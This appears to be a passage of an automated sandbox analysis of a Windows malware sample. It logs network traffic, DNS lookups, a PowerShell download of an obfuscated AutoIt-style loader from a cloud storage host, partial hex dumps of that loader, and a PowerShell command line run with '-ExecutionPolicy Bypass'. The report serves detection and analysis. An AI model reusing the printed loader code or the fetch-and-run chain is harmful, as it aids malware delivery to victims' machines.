                                                                      Oct 7, 2024 21:30:05.465965033 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.465974092 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.465986013 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466001987 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466025114 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.466031075 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466036081 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466119051 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.466129065 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466142893 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466155052 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466248989 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.466255903 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466274977 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466284990 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466355085 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.466372013 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.466382980 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.466439009 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.634366035 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.634392977 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.634476900 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658369064 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658380032 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658392906 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658406973 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658425093 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658432007 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658437967 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658457041 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658463001 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658505917 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658514023 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658524990 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658552885 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658557892 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658579111 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658596039 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658601999 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.658638954 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.658682108 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.837508917 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.837547064 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.837567091 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.837651014 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.859457970 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.859463930 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859500885 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859513044 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859627962 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.859636068 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859662056 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859688044 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859723091 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.859729052 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859802961 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:05.859812021 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:05.859916925 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.010876894 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.010905981 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.010936975 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.011014938 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033019066 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033047915 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033086061 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033099890 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033307076 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033307076 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033318996 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033350945 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033368111 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033385038 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033397913 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033447027 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033456087 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.033473969 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.033528090 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.243410110 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.243571997 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.254591942 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.254610062 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.254638910 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.254699945 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285456896 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285485983 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285521984 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285532951 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285634995 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285646915 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285664082 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285682917 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285741091 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285748005 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285763025 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285814047 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285814047 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285885096 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.285891056 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.285943985 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.480089903 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.480129004 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.480159044 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.480328083 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.480328083 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.499790907 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.499819994 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.499846935 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.499856949 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.499968052 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.499979973 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.500009060 CEST4434973083.140.241.4192.168.2.4
                                                                      Oct 7, 2024 21:30:06.500030994 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.500058889 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.500111103 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:06.909497976 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:07.073082924 CEST49730443192.168.2.483.140.241.4
                                                                      Oct 7, 2024 21:30:07.302570105 CEST49730443192.168.2.483.140.241.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 7, 2024 21:30:01.833945036 CEST5524153192.168.2.41.1.1.1
                                                                      Oct 7, 2024 21:30:02.072568893 CEST53552411.1.1.1192.168.2.4
                                                                      Oct 7, 2024 21:30:10.590367079 CEST6458253192.168.2.41.1.1.1
                                                                      Oct 7, 2024 21:30:10.606520891 CEST53645821.1.1.1192.168.2.4
                                                                      Oct 7, 2024 21:30:30.059900045 CEST4934553192.168.2.41.1.1.1
                                                                      Oct 7, 2024 21:30:30.076343060 CEST53493451.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 21:30:01.833945036 CEST192.168.2.41.1.1.10x55e8Standard query (0)my.cloudme.comA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 21:30:10.590367079 CEST192.168.2.41.1.1.10xf90cStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 21:30:30.059900045 CEST192.168.2.41.1.1.10x488aStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 7, 2024 21:30:02.072568893 CEST1.1.1.1192.168.2.40x55e8No error (0)my.cloudme.com83.140.241.4A (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 21:30:10.606520891 CEST1.1.1.1192.168.2.40xf90cName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                      Oct 7, 2024 21:30:30.076343060 CEST1.1.1.1192.168.2.40x488aName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                      • my.cloudme.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44973083.140.241.44437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-07 19:30:02 UTC191OUTGET /v1/ws2/:stream2/:small/small.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: my.cloudme.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-07 19:30:03 UTC395INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 07 Oct 2024 19:30:03 GMT
                                                                      Content-Type: text/plain; charset=ISO-8859-1
                                                                      Content-Length: 3485122
                                                                      Connection: close
                                                                      Last-Modified: Tue, 01 Oct 2024 19:28:17 GMT
                                                                      Content-Disposition: attachment
                                                                      Cache-Control: private, max-age=0
                                                                      ETag: "66fc4d51-352dc2"
                                                                      Accept-Ranges: bytes
                                                                      Content-Security-Policy: frame-ancestors *.cloudme.com
                                                                      2024-10-07 19:30:03 UTC15989INData Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24
                                                                      Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 4d 45 47 41 55 47 45 20 3d 20 39 38 0a 46 6f 72 20 24 55 63 67 52 20 3d 20 36 32 20 54 6f 20 37 38 36 0a 49 66 20 24 53 74 61 72 74 73 45 71 75 69 74 79 49 6e 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 37 20 54 68 65 6e 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 37 5d 37 38 5d 37 36 5d 37 38 5d 39 32 5d 39 32 5d 37 34 5d 39 31 5d 38 32 5d 38 35 5d 39 38 5d 35 31 5d 38 34 5d 37 34 5d 38 32 5d 35 31 5d 38 31 5d 39 34 5d 39 31 5d 39 31 5d 38 32 5d 37 36 5d 37 34 5d 38 37 5d 37 38 5d 35 31 5d 37 36 5d 38 38 5d 39 36 5d 35 31 22 2c 39 2f 31 29 2c 20 57 61 6c 65 73 28 22 38 37 5d 37 38 5d 37 36 5d 37 38 5d 39 32 5d 39 32 5d 37 34 5d 39 31 5d 38 32 5d 38 35 5d 39 38 5d 35 31 5d 38 34 5d 37 34 5d 38 32 5d 35 31 5d 38 31 5d 39 34 5d
                                                                      Data Ascii: MEGAUGE = 98For $UcgR = 62 To 786If $StartsEquityIncurredLayout = 87 ThenPixelGetColor(Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]91]91]82]76]74]87]78]51]76]88]96]51",9/1), Wales("87]78]76]78]92]92]74]91]82]85]98]51]84]74]82]51]81]94]
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 59 41 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 39 36 20 54 68 65 6e 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 30 5d 31 31 34 5d 31 31 33 5d 31 32 31 5d 31 30 34 5d 31 31 37 5d 31 31 39 5d 31 30 38 5d 31 30 31 5d 31 31 31 5d 31 30 34 5d 33 36 22 2c 32 37 2f 39 29 29 0a 41 54 61 6e 28 36 31 30 30 29 0a 41 53 69 6e 28 34 31 35 33 29 0a 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 42 49 54 52 45 41 44 49 4e 47 53 59 41 20 3d 20 39 37 20 54 68 65 6e 0a 24 4e 61 72 72 6f 77 4c 61 74 69 6e 61 73 4c 69 62 72 61 72 79 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 39 37 5d 37 31 5d 37 30 5d 31 30 31 5d 37
                                                                      Data Ascii: YA + 1EndIfIf $BITREADINGSYA = 96 ThenDriveStatus(Wales("70]114]113]121]104]117]119]108]101]111]104]36",27/9))ATan(6100)ASin(4153)$BITREADINGSYA = $BITREADINGSYA + 1EndIfIf $BITREADINGSYA = 97 Then$NarrowLatinasLibrary = Dec(Wales("97]71]70]101]7
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 64 49 66 0a 49 66 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 33 30 20 54 68 65 6e 0a 4c 6f 63 61 6c 20 24 46 69 6e 64 73 4b 73 44 69 66 66 69 63 75 6c 74 79 55 73 70 73 32 20 3d 20 44 6c 6c 53 74 72 75 63 74 43 72 65 61 74 65 28 57 61 6c 65 73 28 22 31 30 32 5d 31 32 35 5d 31 32 30 5d 31 30 35 5d 39 35 22 2c 31 36 2f 34 29 20 26 20 24 63 65 72 74 69 66 69 63 61 74 65 61 63 74 69 6f 6e 32 20 26 20 57 61 6c 65 73 28 22 39 39 22 2c 36 2f 31 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 33 31 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 32 5d 31 32 30 5d 31
                                                                      Data Ascii: dIfIf $lisaknowledgestormsharpinsight = 30 ThenLocal $FindsKsDifficultyUsps2 = DllStructCreate(Wales("102]125]120]105]95",16/4) & $certificateaction2 & Wales("99",6/1))ExitLoopEndIfIf $lisaknowledgestormsharpinsight = 31 ThenDec(Wales("117]102]120]1
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 30 36 5d 31 30 35 5d 33 37 5d 33 37 5d 33 37 5d 33 37 5d 37 36 5d 31 30 36 5d 31 32 31 5d 33 37 5d 33 37 5d 33 37 5d 33 37 22 2c 34 35 2f 39 29 29 0a 44 65 63 28 57 61 6c 65 73 28 22 38 35 5d 31 30 32 5d 31 30 34 5d 31 31 32 5d 31 30 32 5d 31 30 38 5d 31 30 36 5d 31 32 30 5d 35 32 5d 38 38 5d 31 32 31 5d 31 31 39 5d 31 32 32 5d 31 30 34 5d 31 32 31 5d 31 32 32 5d 31 31 39 5d 31 30 36 5d 31 32 30 5d 35 32 22 2c 32 35 2f 35 29 29 0a 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 24 77 61 69 74 73 75 73 73 65 78 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 77 61 69 74 73 75 73 73 65 78 20 3d 20 31 32 20 54 68 65 6e 0a 24 4e 4d 53 45 41 52 43 48 4f 52 44 45 52 43 41 54 41 4c 4f 47 55 45 20 3d 20 44 6c 6c 53 74 72 75 63 74 43 72 65 61 74 65 28 27 62 79 74 65 5b 27
                                                                      Data Ascii: 06]105]37]37]37]37]76]106]121]37]37]37]37",45/9))Dec(Wales("85]102]104]112]102]108]106]120]52]88]121]119]122]104]121]122]119]106]120]52",25/5))$waitsussex = $waitsussex + 1EndIfIf $waitsussex = 12 Then$NMSEARCHORDERCATALOGUE = DllStructCreate('byte['
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 33 29 29 0a 43 68 72 28 34 38 33 37 29 0a 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 3d 20 34 35 20 54 68 65 6e 0a 24 46 69 73 68 52 6f 6c 61 6e 64 53 74 75 66 66 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 37 36 5d 38 36 5d 38 30 5d 31 32 35 5d 31 31 36 5d 38 38 5d 31 32 38 5d 38 32 5d 31 30 39 5d 38 33 5d 39 36 5d 31 31 35 22 2c 33 36 2f 36 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61
                                                                      Data Ascii: 3))Chr(4837)$settingsomersetvegetarianturn = $settingsomersetvegetarianturn + 1EndIfIf $settingsomersetvegetarianturn = 45 Then$FishRolandStuff = Dec(Wales("117]76]86]80]125]116]88]128]82]109]83]96]115",36/6))ExitLoopEndIfIf $settingsomersetvegeta
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 35 27 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 36 0a 24 54 72 61 64 65 72 57 61 6c 20 3d 20 37 31 0a 57 68 69 6c 65 20 35 34 0a 49 66 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 35 20 54 68 65 6e 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 32 36 2c 20 36 30 36 2c 20 30 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 31 31 36 5d 31 31 33 5d 31 32 31 5d 31 31 37 5d 33 34 5d 39 39 5d 31 31 36 5d 31 31 31 5d 31 32 33 5d 33 34 5d 31 31 36 5d 39 39 5d 31 31 32 5d 31 30 39 5d 31 30 37 5d 31 31 32 5d 31 30 35 5d 33 34 5d 31 31 31 5d 31 30 37 5d 39 39 5d 33 34 22 2c 31 34 2f 37 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64
                                                                      Data Ascii: 5'$StrictRealtorsAdministration = 6$TraderWal = 71While 54If $StrictRealtorsAdministration = 5 ThenPixelGetColor(26, 606, 0)DriveStatus(Wales("116]113]121]117]34]99]116]111]123]34]116]99]112]109]107]112]105]34]111]107]99]34",14/7))$StrictRealtorsAd
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 73 50 73 20 3d 20 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 31 31 38 5d 38 30 5d 31 31 38 5d 31 31 32 5d 31 30 35 5d 36 39 5d 38 30 5d 31 31 39 5d 38 30 5d 39 34 5d 31 32 33 5d 31 32 30 5d 31 31 39 5d 31 30 33 5d 31 31 30 22 2c 31 32 2f 33 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 62 61 73 69 63 73 61 74 68 6c 65 74 69 63 73 20 3d 20 27 39 39 35 37 32 30 35 30 31 39 30 38 39 35 39 38 30 32 31 36 32 35 30 36 35 37 34 38 30 36 32 36 37 34 32 39 37 36 30 37 33 35 37 32 31 34 36 30 34 37 33 32 31 35 38 35 30 30 33 35 36 37 30 35 37 27 0a 24 4a 65 4f 6b 61 79 20 3d 20 35 34 0a 24 4d 69 73 73 65 64 48 61 70 70 79 50 70 43 65 6e 74 72 61 6c 20 3d 20 39 35 0a 46 6f 72 20 24 45 61 52 62 20 3d 20 32 34
                                                                      Data Ascii: sPs = ConsoleWriteError(Wales("118]80]118]112]105]69]80]119]80]94]123]120]119]103]110",12/3))ExitLoopEndIfNext$basicsathletics = '99572050190895980216250657480626742976073572146047321585003567057'$JeOkay = 54$MissedHappyPpCentral = 95For $EaRb = 24
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 30 38 5d 31 32 36 5d 31 30 39 5d 31 32 32 5d 31 32 34 5d 31 31 33 5d 31 32 33 5d 31 30 39 5d 31 31 37 5d 31 30 39 5d 31 31 38 5d 31 32 34 5d 31 32 33 5d 35 33 5d 39 32 5d 31 32 32 5d 31 30 35 5d 31 30 37 5d 31 32 34 5d 35 33 5d 37 36 5d 31 31 39 5d 31 32 37 5d 31 31 38 5d 31 31 36 5d 31 31 39 5d 31 30 35 5d 31 30 38 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 33 22 2c 35 36 2f 37 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 30 5d 31 30 37 5d 31 30 35 5d 31 31 30 5d 31 31 36 5d 31 31 31 5d 31 30 35 5d 31 30 33 5d 31 31 34 5d 34 31 5d 38 39 5d 31 32 33 5d 31 30 39 5d 31 30 39 5d 31 30 37 5d 31 32 31 5d 31 32 32 5d 31 30 37 5d 31 30 36 5d 34 31 22 2c 33 36 2f 36 29 29 0a 24 70 6f 72 74 65 72 6c 61 62 6f 72 61 74 6f 72 79 20
                                                                      Data Ascii: 08]126]109]122]124]113]123]109]117]109]118]124]123]53]92]122]105]107]124]53]76]119]127]118]116]119]105]108]105]106]116]109]53",56/7))DriveStatus(Wales("90]107]105]110]116]111]105]103]114]41]89]123]109]109]107]121]122]107]106]41",36/6))$porterlaboratory
                                                                      2024-10-07 19:30:03 UTC16384INData Raw: 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 37 39 5d 37 30 5d 38 38 5d 36 37 5d 37 34 5d 37 30 5d 34 36 5d 38 33 5d 36 36 5d 37 34 5d 37 37 5d 38 33 5d 38 30 5d 36 36 5d 36 39 5d 34 36 5d 37 32 5d 38 36 5d 37 39 5d 38 34 5d 34 36 5d 36 39 5d 37 34 5d 38 34 5d 36 38 5d 34 36 22 2c 39 2f 39 29 2c 20 57 61 6c 65 73 28 22 37 39 5d 37 30 5d 38 38 5d 36 37 5d 37 34 5d 37 30 5d 34 36 5d 38 33 5d 36 36 5d 37 34 5d 37 37 5d 38 33 5d 38 30 5d 36 36 5d 36 39 5d 34 36 5d 37 32 5d 38 36 5d 37 39 5d 38 34 5d 34 36 5d 36 39 5d 37 34 5d 38 34 5d 36 38 5d 34 36 22 2c 39 2f 39 29 29 0a 24 54 65 6d 70 6c 65 52 65 61 6c 69 73 74 69 63 43 6f 6d 70 61 6e 79 41 6e 79 77 68 65 72 65 20 3d 20 24 54 65 6d 70 6c 65 52 65 61 6c 69 73 74 69 63 43 6f 6d 70 61 6e 79 41 6e 79 77 68 65 72 65
                                                                      Data Ascii: Color(Wales("79]70]88]67]74]70]46]83]66]74]77]83]80]66]69]46]72]86]79]84]46]69]74]84]68]46",9/9), Wales("79]70]88]67]74]70]46]83]66]74]77]83]80]66]69]46]72]86]79]84]46]69]74]84]68]46",9/9))$TempleRealisticCompanyAnywhere = $TempleRealisticCompanyAnywhere


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:15:29:57
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\Desktop\T6l6gPxwQU.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\T6l6gPxwQU.exe"
                                                                      Imagebase:0x7ff6bb120000
                                                                      File size:1'974'272 bytes
                                                                      MD5 hash:FCA042B18ADF613D9A2BE1646663698F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:15:29:58
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
